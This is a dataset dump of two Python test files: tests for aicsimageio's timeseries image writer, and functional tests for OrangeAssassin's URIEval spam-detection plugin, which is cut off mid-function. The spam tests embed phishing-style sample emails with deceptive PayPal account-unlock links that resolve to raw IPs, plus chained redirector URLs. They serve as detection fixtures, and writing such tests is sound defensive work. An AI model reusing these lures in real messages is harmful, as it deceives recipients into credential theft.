b971ee9acbe59bc8c60ab762a3564d151543ee3a
| 4,834
|
py
|
Python
|
aicsimageio/tests/writers/test_timeseries_writer.py
|
brisvag/aicsimageio
|
d372e0d3699ba48adcba0a2c69a1434f0be45e47
|
[
"BSD-3-Clause"
] | 110
|
2019-06-27T16:46:53.000Z
|
2022-03-14T10:37:22.000Z
|
aicsimageio/tests/writers/test_timeseries_writer.py
|
brisvag/aicsimageio
|
d372e0d3699ba48adcba0a2c69a1434f0be45e47
|
[
"BSD-3-Clause"
] | 359
|
2019-06-27T17:50:08.000Z
|
2022-03-30T20:33:10.000Z
|
aicsimageio/tests/writers/test_timeseries_writer.py
|
brisvag/aicsimageio
|
d372e0d3699ba48adcba0a2c69a1434f0be45e47
|
[
"BSD-3-Clause"
] | 26
|
2020-03-11T20:51:06.000Z
|
2022-03-18T20:16:51.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from typing import Callable, Tuple
import numpy as np
import pytest
from aicsimageio import exceptions
from aicsimageio.readers.default_reader import DefaultReader
from aicsimageio.writers.timeseries_writer import TimeseriesWriter
from ..conftest import LOCAL, array_constructor, get_resource_write_full_path
@array_constructor
@pytest.mark.parametrize(
"write_shape, write_dim_order, read_shape, read_dim_order",
[
((30, 100, 100), None, (30, 100, 100), "TYX"),
# Note that files get saved out with RGBA, instead of just RGB
((30, 100, 100, 3), None, (30, 100, 100, 4), "TYXS"),
((100, 30, 100), "XTY", (30, 100, 100), "TYX"),
# Note that files get saved out with RGBA, instead of just RGB
((3, 100, 30, 100), "SYTX", (30, 100, 100, 4), "TYXS"),
pytest.param(
(1, 1),
None,
None,
None,
marks=pytest.mark.raises(exception=exceptions.UnexpectedShapeError),
),
pytest.param(
(1, 1, 1, 1, 1),
None,
None,
None,
marks=pytest.mark.raises(exception=exceptions.UnexpectedShapeError),
),
pytest.param(
(1, 1, 1, 1, 1, 1),
"STCZYX",
None,
None,
marks=pytest.mark.raises(exception=exceptions.UnexpectedShapeError),
),
pytest.param(
(1, 1, 1, 1),
"ABCD",
None,
None,
marks=pytest.mark.raises(
exception=exceptions.InvalidDimensionOrderingError
),
),
],
)
@pytest.mark.parametrize("filename", ["e.gif"])
def test_timeseries_writer(
array_constructor: Callable,
write_shape: Tuple[int, ...],
write_dim_order: str,
read_shape: Tuple[int, ...],
read_dim_order: str,
filename: str,
) -> None:
# Create array
arr = array_constructor(write_shape, dtype=np.uint8)
# Construct save end point
save_uri = get_resource_write_full_path(filename, LOCAL)
# Normal save
TimeseriesWriter.save(arr, save_uri, write_dim_order)
# Read written result and check basics
reader = DefaultReader(save_uri)
# Check basics
assert reader.shape == read_shape
assert reader.dims.order == read_dim_order
# Can't do "easy" testing because compression + shape mismatches on RGB data
@array_constructor
@pytest.mark.parametrize(
"write_shape, write_dim_order, read_shape, read_dim_order",
[
# We use 112 instead of 100 because FFMPEG block size warnings are annoying
((30, 112, 112), None, (30, 112, 112, 3), "TYXS"),
# Note that files get saved out with RGBA, instead of just RGB
((30, 112, 112, 3), None, (30, 112, 112, 3), "TYXS"),
((112, 30, 112), "XTY", (30, 112, 112, 3), "TYXS"),
# Note that files get saved out with RGBA, instead of just RGB
((3, 112, 30, 112), "SYTX", (30, 112, 112, 3), "TYXS"),
pytest.param(
(1, 1),
None,
None,
None,
marks=pytest.mark.raises(exception=exceptions.UnexpectedShapeError),
),
pytest.param(
(1, 1, 1, 1, 1),
None,
None,
None,
marks=pytest.mark.raises(exception=exceptions.UnexpectedShapeError),
),
pytest.param(
(1, 1, 1, 1, 1, 1),
"STCZYX",
None,
None,
marks=pytest.mark.raises(exception=exceptions.UnexpectedShapeError),
),
pytest.param(
(1, 1, 1, 1),
"ABCD",
None,
None,
marks=pytest.mark.raises(
exception=exceptions.InvalidDimensionOrderingError
),
),
],
)
@pytest.mark.parametrize("filename", ["f.mp4"])
def test_timeseries_writer_ffmpeg(
array_constructor: Callable,
write_shape: Tuple[int, ...],
write_dim_order: str,
read_shape: Tuple[int, ...],
read_dim_order: str,
filename: str,
) -> None:
# Create array
arr = array_constructor(write_shape, dtype=np.uint8)
# Construct save end point
save_uri = get_resource_write_full_path(filename, LOCAL)
# Catch invalid save
# if host == REMOTE:
# with pytest.raises(IOError):
# TimeseriesWriter.save(arr, save_uri, write_dim_order)
# return
# Normal save
TimeseriesWriter.save(arr, save_uri, write_dim_order)
# Read written result and check basics
reader = DefaultReader(save_uri)
# Check basics
assert reader.shape == read_shape
assert reader.dims.order == read_dim_order
# Can't do "easy" testing because compression + shape mismatches on RGB data
| 29.839506
| 83
| 0.586057
| 564
| 4,834
| 4.897163
| 0.216312
| 0.018827
| 0.019551
| 0.017379
| 0.809196
| 0.789283
| 0.78168
| 0.78168
| 0.766112
| 0.766112
| 0
| 0.053687
| 0.298717
| 4,834
| 161
| 84
| 30.024845
| 0.761062
| 0.176665
| 0
| 0.803419
| 0
| 0
| 0.051062
| 0
| 0
| 0
| 0
| 0
| 0.034188
| 1
| 0.017094
| false
| 0
| 0.059829
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b97a762e174387930091872ed29f46fafd9ea2c2
| 31,989
|
py
|
Python
|
tests/functional/test_plugins/test_uri_eval.py
|
Worteks/OrangeAssassin
|
21baf0b84fbedd887f6d88e13c624f14fb0b5e06
|
[
"Apache-2.0"
] | null | null | null |
tests/functional/test_plugins/test_uri_eval.py
|
Worteks/OrangeAssassin
|
21baf0b84fbedd887f6d88e13c624f14fb0b5e06
|
[
"Apache-2.0"
] | null | null | null |
tests/functional/test_plugins/test_uri_eval.py
|
Worteks/OrangeAssassin
|
21baf0b84fbedd887f6d88e13c624f14fb0b5e06
|
[
"Apache-2.0"
] | null | null | null |
"""Functional tests for URIEval Plugin"""
from __future__ import absolute_import
import random
import sys
import unittest
from string import ascii_letters
from string import digits
import tests.util
# Load plugin and report matched RULES and SCORE
PRE_CONFIG = """
loadplugin oa.plugins.uri_eval.URIEvalPlugin
report _SCORE_
report _TESTS_
"""
# Define rules for plugin
CONFIG = """
body CHECK_FOR_HTTP_REDIRECTOR eval:check_for_http_redirector()
body CHECK_HTTPS_IP_MISMATCH eval:check_https_ip_mismatch()
body CHECK_URI_TRUNCATED eval:check_uri_truncated()
"""
class TestFunctionalURIEval(tests.util.TestBase):
"""Class containing functional tests for the URI Plugin"""
mytext = [random.choice(ascii_letters + digits) for _ in range(8182)]
long_text = "".join(mytext)
def test_check_for_http_redirector(self):
email = """From: sender@example.com
\nhttp://utility.baidu.com/traf/click.php?id=215&url=https://log0.wordpress.com"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_FOR_HTTP_REDIRECTOR'])
def test_check_for_http_redirector_in_a_label_closed_commas(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://utility.baidu.com/traf/click.php?id=215&url=https://log0.wordpress.com"></a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_FOR_HTTP_REDIRECTOR'])
@unittest.skipIf(sys.version_info.major == 3 and sys.version_info.minor < 3,
'Incompatible with python 3.2.*')
def test_check_for_http_redirector_in_a_label_no_commas(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href=http://utility.baidu.com/traf/click.php?id=215&url=https://log0.wordpress.com></a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_FOR_HTTP_REDIRECTOR'])
def test_check_for_http_redirector_links_combined(self):
email = """From: sender@example.com
\nhttp://utility.baidu.com/traf/click.php?id=215&urlhttps://log0.wordpress.com"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_FOR_HTTP_REDIRECTOR'])
def test_check_for_http_redirector_no_http(self):
email = """From: sender@example.com
\nhttp://utility.baidu.com/traf/click.php?id=215&url=://log0.wordpress.com"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_http_redirector_with_ftp(self):
email = """From: sender@example.com
\nhttp://utility.baidu.com/traf/click.php?id=215&url=ftp://log0.wordpress.com"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_http_redirector_only_http(self):
email = """From: sender@example.com
\nhttp://utility.baidu.com/traf/click.php?id=215&url=https://"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_http_redirector_incomplete_link(self):
email = """From: sender@example.com
\nhttp://utility.baidu.com/traf/click.php?id=215&url=https://ceva"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_FOR_HTTP_REDIRECTOR'])
def test_check_for_http_redirector_different_links(self):
email = """From: sender@example.com
\nhttp://utility.baidu.com/traf/click.php?id=215&url= https://ceva.com"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_http_redirector_middle_of_body(self):
email = """From: sender@example.com
\nFYI, this week is Learning Week @LinkedIn, so if you are interested in taking some free courses, hurry up
asfglajds;galsg a;slfa;sl laddg http://utility.baidu.com/traf/click.php?id=215&url=https://ceva.com asdgksal;fjlaskfdghs"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_FOR_HTTP_REDIRECTOR'])
def test_check_for_https_ip_mismatch(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited http://utility.baidu.com/traf/click.php?id=215&url=https://log0.wordpress.com:
<a href="http://45.42.12.12/login/account-unlock">https://www.paypal.com/login/account-unlock</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 2, ['CHECK_HTTPS_IP_MISMATCH', 'CHECK_FOR_HTTP_REDIRECTOR'])
def test_check_for_https_ip_mismatch_and_redirector_in_a_label(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://google.com=https://log0.wordpress.com/">https://ceva.com/</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_FOR_HTTP_REDIRECTOR'])
def test_check_for_https_ip_mismatch_and_redirector_in_a_label_with_invalid_expression(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://@1.2.3.4=https://log0.wordpress.com/">https://ceva.com/</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_FOR_HTTP_REDIRECTOR'])
def test_check_for_https_ip_mismatch_and_redirector_in_a_label_ip_left(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/https://log0.wordpress.com/">https://ceva.com/</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 2, ['CHECK_HTTPS_IP_MISMATCH', 'CHECK_FOR_HTTP_REDIRECTOR'])
def test_check_for_https_ip_mismatch_and_redirector_in_link_label_same_address(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<link rel=parent href="http://log0.wordpress.com/https://log0.wordpress.com/">
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_https_ip_mismatch_and_redirector_in_link_label(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<link rel=parent href="http://google.com=https://log0.wordpress.com/">https://ceva.com/
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_FOR_HTTP_REDIRECTOR'])
def test_check_for_https_ip_mismatch_and_redirector_in_link_label_with_invalid_expression(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<link rel=parent href="http://@1.2.3.4=https://log0.wordpress.com/">https://ceva.com/
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_FOR_HTTP_REDIRECTOR'])
def test_check_for_https_ip_mismatch_and_redirector_in_link_label_ip_left(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<link rel=parent href="http://1.2.3.4=https://log0.wordpress.com/">https://ceva.com/
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_FOR_HTTP_REDIRECTOR'])
def test_check_for_https_ip_mismatch_domains(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://google.com/">https://www.google.com/</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_https_ip_mismatch_domains_incomplete_right(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://google.com/"> cevatest https://ceva/</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_https_ip_mismatch_ip_right(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://google.com/">http://300.58.209.206/</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_https_ip_mismatch_both_ips(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://5.79.73.204/">http://300.58.209.206/</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_https_ip_mismatch_incomplete_domain(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://5.79.73.204/">https://ceva/</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_HTTPS_IP_MISMATCH'])
def test_check_for_https_ip_mismatch_ipv6_left(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://2001:1af8:4700:a02d:2::1/">https://1.2.3.4/</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_https_ip_mismatch_ipv6_left_domain_right(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://2001:1af8:4700:a02d:2::1/">https://yahoo.com/</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_HTTPS_IP_MISMATCH'])
def test_check_for_https_ip_mismatch_ipv6_left_multiple_labels(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://2001:1af8:4700:a02d:2::1/">https://1.2.3.4/</a>
<a href="http://2001:1af8:4700:a02d:2::1/">https://yahoo.com/</a>
<a href="http://2001:1af8:4700:a02d:2::1/">https://6.6.6.6/</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_HTTPS_IP_MISMATCH'])
def test_check_for_https_ip_mismatch_ipv6_with_redirector(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://2001:1af8:4700:a02d:2::1/https://test">https://1.2.3.4/</a>
<a href="http://2001:1af8:4700:a02d:2::1/">https://yahoo.com/</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 2, ['CHECK_HTTPS_IP_MISMATCH', 'CHECK_FOR_HTTP_REDIRECTOR'])
def test_check_for_https_ip_mismatch_ipv6_with_redirector_and_link_label(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://2001:1af8:4700:a02d:2::1/https://test">https://1.2.3.4/</a>
<a href="http://2001:1af8:4700:a02d:2::1/">https://yahoo.com/</a>
<link href="http://2001:1af8:4700:a02d:2::1/">https://yahoo.com/
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 2, ['CHECK_HTTPS_IP_MISMATCH', 'CHECK_FOR_HTTP_REDIRECTOR'])
def test_check_for_https_ip_mismatch_ipv6_with_false_redirector(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://2001:1af8:4700:a02d:2::1/https://2001:1af8:4700:a02d:2::1">https://1.2.3.4/</a>
<a href="http://2001:1af8:4700:a02d:2::1/">https://yahoo.com/</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_HTTPS_IP_MISMATCH'])
def test_check_for_https_ip_mismatch_incorrect_ipv4_domain_right(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://2001:1af8:4700:a02d/https://2001:1af8:4700:a02d/">https://yahoo.com/</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_https_ip_mismatch_no_domain(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/">https://</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_HTTPS_IP_MISMATCH'])
def test_check_for_https_ip_mismatch_incorrect_ip(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3/">https://</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_https_ip_mismatch_unfinished_ip(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3./">https://</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_https_ip_mismatch_inverted_commas_16_ip(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.'2'.3.4/">https://test.com</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_https_ip_mismatch_inverted_commas_ip_right(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/">https://'1'.2.3.4</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_HTTPS_IP_MISMATCH'])
def test_check_for_https_ip_mismatch_inverted_commas_on_all_ip(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://'1.2.3.4'/">https://test.com</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_https_ip_mismatch_invalid_expression_ip(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://@1.2.3.4/">https://test.com</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_https_ip_mismatch_ipv6_right(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/">https://2001:1af8:4700:a02d:2::1/</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_https_ip_mismatch_same_ipv6_right_and_left(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://2001:1af8:4700:a02d:2::1/">https://2001:1af8:4700:a02d:2::1/</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_https_ip_mismatch_same_ipv6_right_and_left_with_redirector(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://2001:1af8:4700:a02d:2::1/https://2901:1af8:4711:a02d:2::1">https://2901:1af8:4711:a02d:2::1/</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_FOR_HTTP_REDIRECTOR'])
def test_check_for_https_ip_mismatch_same_ipv6_right_and_left_with_redirector_negative(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://2001:1af8:4700:a02d:2::1/https://2001:1af8:4700:a02d:2::1/">https://2901:1af8:4711:a02d:2::1/</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_https_ip_mismatch_text_between_links_domain_right(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/"> cevatest https://google.com/</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_HTTPS_IP_MISMATCH'])
def test_check_for_https_ip_mismatch_text_between_links_ip_right(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/"> cevatest https://1.2.3.4/</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_https_ip_mismatch_with_multiple_uri(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/"> cevatest https://1.2.3.4/ https://test.com/</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_HTTPS_IP_MISMATCH'])
def test_check_for_redirector_with_multiple_redirector(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/https://1.2.3.4/https://test.com/https://1.2.3.4/"> cevatest https://1.2.3.4/</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_FOR_HTTP_REDIRECTOR'])
def test_check_for_redirector_with_multiple_redirector_negative(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/https://1.2.3.4/https://1.2.3.4/"> cevatest https://1.2.3.4/</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_https_ip_mismatch_label_not_closed(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/">https://google
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_HTTPS_IP_MISMATCH'])
def test_check_for_https_ip_mismatch_incorrect_link_label(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<link href="http://1.2.3.4/">https://google.com/</link>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_https_ip_mismatch_multiple_labels_redirector_in_link_label(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/">https://5.5.5.5/</a>
<link href="http://1.2.3.4/https://google.com/">
<a href="http://1.2.3.4/">https://6.6.6.6/</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_FOR_HTTP_REDIRECTOR'])
def test_check_for_https_ip_mismatch_multiple_labels_match_on_a(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/">https://google.com/</a>
<link href="http://1.2.3.4/">https://test.com/
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_HTTPS_IP_MISMATCH'])
def test_check_for_https_ip_mismatch_multiple_labels_match_on_both(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/">https://google.com/</a>
<link href="http://1.2.3.4/https://test.com/">
<a href="http://6.6.6.6/"></a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 2, ['CHECK_HTTPS_IP_MISMATCH', 'CHECK_FOR_HTTP_REDIRECTOR'])
def test_check_for_https_ip_mismatch_multiple_labels(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/">https://5.5.5.5/</a>
<a href="http://1.2.3.4/">https://google.com/</a>
<a href="http://1.2.3.4/">https://6.6.6.6/></a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_HTTPS_IP_MISMATCH'])
def test_check_for_https_ip_mismatch_multiple_labels_match_last(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/">https://5.5.5.5/</a>
<a href="http://1.2.3.4/">https://google.com/</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_HTTPS_IP_MISMATCH'])
def test_check_for_https_ip_mismatch_multiple_labels_match_first(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
<a href="http://1.2.3.4/">https://google.com/</a>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/">https://5.5.5.5/</a>
<a href="http://1.2.3.4/">https://1.2.3.4./</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_HTTPS_IP_MISMATCH'])
def test_check_for_uri_truncated_negative(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="https://www.PAYPAL.com/login/account-unlock">https://www.PAYPAL.com/...</a>
</html>"""
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_uri_truncated_superior_limit(self):
mytext1 = [random.choice(ascii_letters + digits) for _ in range(8181)]
long_text1 = "".join(mytext1)
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://%s.com">https://test.com</a>
</html>"""
email = email % (long_text1)
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_uri_truncated(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://%s.com">https://test.com</a>
</html>"""
email = email % (self.long_text)
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
